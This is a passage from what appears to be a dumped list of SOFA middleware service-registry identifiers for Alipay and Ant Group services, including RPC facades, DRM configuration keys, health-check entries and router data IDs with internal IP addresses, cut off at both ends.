EFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finasmcore.common.service.facade.predict.service.SelledCountPredictFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ideploy.common.service.control.service.OpChangeControlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.ctuevent.CtuEventInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.fop.api.ShopQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.170.186#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_DATAPROFILING#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.150.127#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.acctrans.service.facade.PrePaymentAccountTransWithUniqueFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.biz.shared.pocketmoney.CommonSwitchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkpayplatform.common.service.facade.spi.AssetConsultService:1.0:gloanpay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pfunddts.common.facade.api.FundEntryCheckApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:argo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.69.243.204#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.icontrol.common.service.facade.api.ScheduleApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.order.OrderOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.108.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ropcn.common.service.facade.api.qa.QuestionAnswerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.thor.service.ThorSelectorCacheFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.opscore.common.service.facade.OpsActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fraudmng.common.service.facade.variable.VariableRefenceServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iconnect.common.facade.api.DeliverySpaceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.cashing.facade.AssetCashingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.seekers.facade.apis.EntityCategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.aliinvoiceprod.integration.esign.EsignSignUpServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.template.VcpVoucherTemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:unimetaservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fintradecenter.common.service.facade.fortest.AccorderEventHandlerTest:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.rabbit.common.service.facade.RabbitPluginConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.article.LifeContentOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.union.UnionCampManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:insxbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataconsole.zdal.service.ZdalConfigService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accrmcore.common.service.facade.CRMLabelFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.bizprodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.totalUrlDecodeTimes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundprod.common.service.facade.product.manage.ProductIndicatorFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.bp.engine.extension.BPBizFnHandler:1.0:ideploy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.facade.unifygw.InsUnifyGatewayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.signExpireEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileha.biz.manager.ClientPerfTinyManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.common.event.UniformEventMessageListener:1.0:pcardcoreRzone@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.trafficlimitcenter.service.facade.VolumeChangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.ordermng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaLogParamSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inshealthprod.facade.GiftPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test3@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.core.api.HyCheckTaskRunService:1.0:ar-and-orderlink-property-check@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfundcenter.common.service.facade.api.FundExceptionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.workflow.service.facade.callback.ProcessCallback:1.0:taskcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchishub.common.service.facade.api.DecisionConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqResourceDrm.batchConsumeAntMessageCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mqconsole.facade.HomeFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:ebppprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.CrowdImportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bluearmyprod:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileha.biz.alarmanalysis.manager.changeanalysisV2.ChangeAnalysisManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.payacceptance.AgrtCommonConfigureManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publichome.common.service.facade.message.template.CardServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.173#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.loancore.common.service.facade.alipay.api.rzone.ZlcTransRzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmcscore.facade.IssueFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.iamlmng.biz.verify.common.interfaces.TaskQueueMananger:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.flashcheck.common.service.facade.api.FlashcheckQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.common.service.facade.api.QuotationInputFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insautobff:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.secuprod:name=com.alipay.secuprod.biz.fund.common.FundAIPConfig.supportedRuleConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zqueue.client.qaZQueue42#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchishub.common.service.facade.operationlog.OperationLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.limiter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcenter.common.dal.mcenter.auto.daointerface.McenterSettleOrderDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.238.57#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openmonitor.cloudmonitor.service.facade.ContactManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotstore.bus.client.BusClientAssist:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.falcon.common.facade.FundQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.market.common.FwCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.paycore.PmtRfdStyCfgFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetPrepareService:1.0:pledgecoreAssetPrepareService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.checkroute.common.service.checkersdk.service.CheckerService:1.0:sdchecker_yiwan@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finfundprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.49.166#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.23.224.254#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.unitestcenter.common.service.facade.api.DatacenterFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautoagent.common.telworkbench.insure.AutoAgentEnquiryPortalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.livekit.LiveComponentPushFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.237.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rcreportcenter.common.util.AntConfigService:1.0:antConfigService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.operatelog.api.OperateLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.RcHgExternalPunishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:familycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.config.api.ApiCommunicateRuleQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:sesameCredit_recneptune@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdBankInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopencore.common.service.live.facade.LiveInfoQueryBFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@appfuse#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.insxhbprod.common.service.facade.PlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:amldata@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accenter.core.service.dailycut.SubLedgerTitleDailySubTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.alinode:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.bizTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finslip:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecashier.senior.service.facade.MobilecashierOrderFacade:1.0:pcreditprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.message.AppNotifyUnifiedSendManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.signExpireInterval,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.dchainconfigcenter.facade.kmi.api.KmiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.dchainconfigcenter.facade.config.api.ConfigurationReaderService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.taskcenter.TaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CLOUDINC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.ordermng:name=com.alipay.ordermng.common.util.drm.ArContractOperateDRM.dblWtrPsCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insautomarket.common.facade.notify.AutoMktNotifyFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.admin.service.ProductConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.FundBankContractService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.allin.facade.KbItemApplyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uemprod.common.service.facade.yueyuli.YuEYuLiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbomp.common.service.facade.industry.api.IndustryActivityManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.fundApplyFailResultCodeList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfpcenter:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ficcldc:name=com.alipay.zcbprod.common.service.facade.ldc.toggle.FacadeZoneSwitchDrm.switchRzWhiteListsConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.imobileprod.common.service.api.facade.lbs.MobileLbsUserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.isdsp.common.service.facade.QueryCenterServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.msg.UniformEventPublisherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.110#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfundtrade:name=com.alipay.finfundtrade.common.service.facade.drm.FinfundtradeGzoneDrmConfig.gzoneOrderIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebillcenter.common.service.facade.EbillFamilyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.market.seller.OfferingManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.icifTairCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@ofpgrowth#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.finstrategy.common.service.facade.fixedinvestment.SprLatestUserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.biz.xflush.rest.GrepLogRestDev#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.bksupplychainprod.common.service.facade.ticket.api.ScpTicketSignService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compmng.service.facade.hf.service.HfVoiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promox.facade.attack.AttackTaskFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:pcreditbenefit@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.content.AccountUpperLimitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmcscore.facade.ChangeOrderMarketFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.agdscsalipay.common.service.facade.names.NameListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.faudiorec.common.service.facade.mini.MiniBizServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.UserViewInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@membertangram#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","config:com.alipay.bpaas.trade.facade.basetrade.BuyerPayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.csportal.biz.bean.ServiceTest:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:insopenprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.redeem.facade.FintradeRedeemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:punishcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mcomment_GRZONE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fporgassetswap@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.login.LoginInfoHistoryServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.chaos.dig.facade.trace.FinriskTraceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.bluearmyprod:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.transferprod.common.service.facade.api.AutoDepositFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkstmtcore.common.service.facade.statement.loan.LoanRepayPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_B_CREDIT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.bizprodmng:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finbatch:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableJdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.176.88#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.126.120#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.meshyorg.common.service.facade.spi.AssetsProcessSpiFacade:1.0:customerAssetsProcessSpiFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.presstest.PressTestDataRecordQueryFacade:1.0:PDCORE_ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmcscore.facade.ImplementationPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rtss.common.service.facade.TaskModelScoreQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.testTool.CaseResultService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iinnertrans.facade.api.config.SettleAccountPropManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.core.service.promoworkbench.PageDesinConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.rule.core.repository.drm.RepositoryConfigResource.repositoryConfigProperty,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.databus.common.manage.facade.DiagnosisService:1.0:busYuebao@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.finauth.service.InstSpAccountAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.common.service.client.gbase.impl.GeaBaseControlResourceImpl.spike,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_AIXGW#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cflesserpanda@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:accorderexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0.0:revmng_processmng_callback_handler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.core.service.drm.AstcQueryDrmResourceInterface:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:thortwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.autoaccess.EbppPreInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.olive.facade.api.enroll.EnrollManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloaninsight.common.service.facade.service.ProductRouteInsightFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instdispute.facade.api.BizSourceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegeocoding.common.service.facade.OfflineSceneRecognitionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassistantcore.common.service.facade.userevent.api.UserEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unirelease.common.service.facade.UniReleaseSpi:1.0:workload@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.edeductcenter.common.service.facade.CreateEbppBillCallBack:1.0:pucprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exratecenter.service.facade.api.ExRateCodeConfigQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxiangw.common.service.packet.InsTmplBindFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassistantcore.mng.facade.tenant.api.MngTenantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opssla.common.service.facade.ResourceManageFacade:1.0:riskmerchant@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.ssm.UserTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.ContinuousFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.0.106#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:certs@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:securityservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.UserSecurityRiskQueryService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qconsole.facade.conf.AntqSubscriptionGroupFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.imasp.common.service.facade.ServiceRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.mordercenter.KouBeiFacePayInvokeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.76.144#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.abilitycore.common.service.facade.plugin.AbilityPluginConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.irecon.common.service.query.fundboss.api.QueryFxInstItemForIfundBossService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:openinsight@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.AntVip-Server:name=com.alipay.antvip.server.conf.DrmControl.pollingWorkerIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.imobileprod.common.service.api.facade.fps.FpsAddressFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:xuanniaosff#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.fcbuservice.common.service.facade.ProcessActionFacade:1.0:shangcheng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdlib.wtable.service.WideTableService:1.0:featureWtable@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqualitywalleetoe.common.service.integration.proxy.WalleProxy:1.0:execute-preOnline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0:zdataassets@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.api.product.ProductQueryFacade:1.0:PDCORE_ANTGW2CN_FOR_ZP@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cxbiz.membersolution.common.service.facade.api.arrangement.ArrangementManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:finaicontentcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.zcache.log.ordermng.logLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.astaralarm.common.service.facade.tvm.AsocArchMaintainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.common.service.f